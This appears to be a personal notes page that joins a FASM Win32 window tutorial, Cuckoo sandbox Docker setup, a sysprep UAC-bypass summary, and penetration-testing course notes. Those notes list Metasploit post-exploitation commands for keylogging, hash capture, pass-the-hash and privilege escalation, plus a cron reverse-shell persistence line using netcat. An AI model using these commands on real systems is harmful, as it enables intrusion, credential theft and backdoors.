Iczelion Tutorial 3 FASM Solution "Window Procedure"

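format PE GUI 4.0                       ; 32-bit Win32 GUI executable, subsystem version 4.0
include 'win32ax.inc'                   ; FASM Win32 headers: invoke/proc macros, API structs and constants
entry start                             ; process entry point, defined in section '.code'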


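section '.data' data readable writable
 wHMain         dd ?                    ; HWND of the main window (result of CreateWindowEx)
 wHInstance     dd ?                    ; HINSTANCE of this module (result of GetModuleHandleA)
 wTitle         db 'Tutorial 3.0', 0    ; window caption, NUL-terminated ANSI string
 wClsName       db 'TUT3', 0            ; class name shared by RegisterClass and CreateWindowEx

 wMsg           MSG                     ; message buffer filled by GetMessage in the message loop
 wCls           WNDCLASS                ; class descriptor; only some fields are written in start,
                                        ; the rest (cbClsExtra, cbWndExtra, lpszMenuName) rely on
                                        ; the loader zero-filling uninitialized data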

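section '.code' code readable executable
 start:
      ;; register the window class
      ;; eax = HINSTANCE of this module; it owns both the class and the window
      invoke GetModuleHandleA, NULL
      mov [wHInstance], eax
      mov [wCls.hInstance], eax
      mov [wCls.style], CS_HREDRAW or CS_VREDRAW
      mov [wCls.lpfnWndProc], window_procedure
      mov [wCls.lpszClassName], wClsName
      mov [wCls.hbrBackground], COLOR_WINDOW+1    ; system colour index + 1, as WNDCLASS requires
      invoke LoadIcon, NULL, IDI_APPLICATION
      mov [wCls.hIcon], eax
      invoke LoadCursor, NULL, IDC_ARROW
      mov [wCls.hCursor], eax
      invoke RegisterClass, wCls

     ;; create the main window
     invoke CreateWindowEx,\
            0,\
            wClsName,\
            wTitle,\
            WS_OVERLAPPEDWINDOW,\
            CW_USEDEFAULT,\
            CW_USEDEFAULT,\
            CW_USEDEFAULT,\
            NULL,\
            NULL,\
            [wHInstance],\
            NULL
     test eax, eax                      ; NULL HWND: class registration or creation failed
     jz window_fatal_exit
     mov [wHMain], eax
     invoke ShowWindow, [wHMain], SW_SHOW

     ;; message loop
     ;; GetMessage returns 0 on WM_QUIT and -1 on error; both must leave the loop,
     ;; otherwise -1 would dispatch a stale wMsg forever
     window_message_loop_start:
        invoke GetMessage, wMsg, NULL, 0, 0
        test eax, eax
        jz window_message_loop_end
        cmp eax, -1
        je window_fatal_exit
        invoke TranslateMessage, wMsg
        invoke DispatchMessage, wMsg
        jmp window_message_loop_start

     window_message_loop_end:
        invoke ExitProcess, [wMsg.wParam]   ; exit code supplied to PostQuitMessage (0 here)

     window_fatal_exit:
        invoke ExitProcess, 1           ; non-zero exit code so a failed start is observable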

    ;; window_procedure
    proc window_procedure, hWnd, uMsg, wParam, lParam
         push ebx esi edi
         cmp [uMsg], WM_DESTROY
         je wmDESTROY

         wmDEFAULT:
                invoke DefWindowProc, [hWnd], [uMsg], [wParam], [lParam]
                jmp wmBYE

        wmDESTROY:
                invoke PostQuitMessage, 0

        wmBYE:
                pop edi esi ebx
                ret
    endp
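section '.idata' import data readable writable
;; import table: each symbol on the left is the name used by invoke above,
;; the string on the right is the exported name (ANSI 'A' variants where they exist)
library kernel32, 'kernel32.dll',\
        user32, 'user32.dll'

import  kernel32,\
        GetModuleHandleA, 'GetModuleHandleA',\
        ExitProcess, 'ExitProcess'

import  user32,\
        RegisterClass, 'RegisterClassA',\
        CreateWindowEx, 'CreateWindowExA',\
        DefWindowProc, 'DefWindowProcA',\
        ShowWindow, 'ShowWindow',\
        LoadCursor, 'LoadCursorA',\
        LoadIcon, 'LoadIconA',\
        GetMessage, 'GetMessageA',\
        TranslateMessage, 'TranslateMessage',\
        DispatchMessage, 'DispatchMessageA',\
        PostQuitMessage, 'PostQuitMessage'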












Installing Cuckoo Sandbox on Mac OS

Source: https://github.com/blacktop/docker-cuckoo

Thanks to Blacktop for the tip!
curl -sL https://github.com/blacktop/docker-cuckoo/raw/master/docker-compose.yml > docker-compose.yml
$ docker-compose up -d
# Cuckoo API is listening on port 8000 now.
$ curl $(docker-machine ip):8000/cuckoo/status


Useful Commands:

$ docker run -d --name mongo mongo
$ docker run -d --name postgres -e POSTGRES_PASSWORD=cuckoo postgres
$ docker run -d --name elasticsearch elasticsearch
$ docker run -d -v $(pwd)/conf:/cuckoo/conf:ro \
--link postgres \
-p 8000:1337 \
blacktop/cuckoo api
$ docker run -d -v $(pwd)/conf:/cuckoo/conf:ro \
--link mongo \
--link elasticsearch \
-p 80:31337 \
blacktop/cuckoo web
docker run blacktop/cuckoo daemon       # start cuckoo.py
docker run blacktop/cuckoo submit # run utils/submit.py
docker run blacktop/cuckoo process # run utils/process.py
docker run blacktop/cuckoo api # starts the RESTful API
docker run blacktop/cuckoo web # starts web UI
docker run blacktop/cuckoo distributed # runs distributed/app.py
docker run blacktop/cuckoo stats # utils/stats.py
docker run blacktop/cuckoo help # runs cuckoo.py --help

User Account Control Bypass

Source: http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html
Goal: Advance knowledge surrounding User Account Control (UAC) bypass techniques.

Let's begin with the sysprep method, which is the most commonly used method of bypassing UAC. Made famous by Leo Davidson in 2009, it involves the following steps:

1. Copy/plant a DLL in the C:\Windows\System32\sysprep directory. The name of the DLL depends on the Windows version:

CRYPTBASE.dll for Windows 7
shcore.dll for Windows 8

2. Execute sysprep.exe from the above directory. It will load the above DLL and execute it with elevated privileges.

In fact, all the UAC bypass methods involve playing with DLL and executable names and locations. See the table below:


Advanced Penetration Testing: Post-Exploitation

Course:  Georgia Weidman on “Advanced Penetration Testing” at Cybrary


(1) Metasploit Scripts:

msf > use post/windows/gather/enum_logged_on_users

(2) Railgun
Extension for Meterpreter that allows access to the Windows API
meterpreter > irb
>> client.railgun.shell32.IsUserAnAdmin

(3) Local Privilege Escalation: GetSystem
meterpreter > getsystem

(4) Local Privilege Escalation: Local Exploits
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > set payload windows/meterpreter/reverse_tcp

(5) Local Privilege Escalation: Bypassing UAC
msf > use exploit/windows/local/bypassuac

(6) Local Privilege Escalation: Using a Public Exploit
Public exploit in /usr/share/exploitdb

(7) Local Information Gathering: Searching for Files
meterpreter > search -f *password*

(8) Local Information Gathering: Gathering Passwords
/usr/share/metasploit-framework/modules/post/windows/gather/credentials

(9) Local Information Gathering: Keylogging
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

(10) Lateral Movement: PSExec
msf > use exploit/windows/smb/psexec

(11) Lateral Movement: Pass the Hash
Replace password with the LM:NTLM hash from hashdump
We are still able to authenticate using Psexec

(12) Lateral Movement: Token Impersonation
load incognito
list tokens -u

(13) Lateral Movement: SMB Capture
Set up SMB capture server in Metasploit
Drop into a shell in a session with an impersonated token

(14) Pivoting through Metasploit
route add 172.16.85.0 255.255.255.0 2
Routes traffic to 172.16.85.0/24 network through session 2

(15) Pivoting with socks4a and proxychains
use auxiliary/server/socks4a
Edit /etc/proxychains.conf change port to 1080
proxychains nmap -Pn -sT -sV -p 445,446 172.16.85.190

(16) NBNS Spoofing
Listen for NBNS requests and respond accordingly; this can get machines to send hashes or possibly even plaintext credentials
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set spoofip 192.168.20.9
msf auxiliary(nbns_response) > exploit
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /root/johnsmb
msf auxiliary(smb) > exploit
msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set LOGFILE /root/httplog
msf auxiliary(http_ntlm) > set URIPATH /
msf auxiliary(http_ntlm) > set SRVPORT 80
msf auxiliary(http_ntlm) > exploit

(17) Responder
Automates NBNS spoofing attacks
cd Responder
python Responder.py -i 192.168.20.9

(A) Persistence: Adding a User
net user john johnspassword /add /domain
net localgroup administrators john /add /domain
Add /domain at the end to add the user to a domain as well

(B) Persistence: With Metasploit Script
The Metasploit persistence script creates an autorun entry in the registry. Not stealthy (writes to disk)
run persistence -r 192.168.20.9 -p 2345 -U

(C) Persistence: Crontabs
Add to /etc/crontab file
*/10 * * * * root nc 192.168.20.9 12345 -e /bin/bash

service cron restart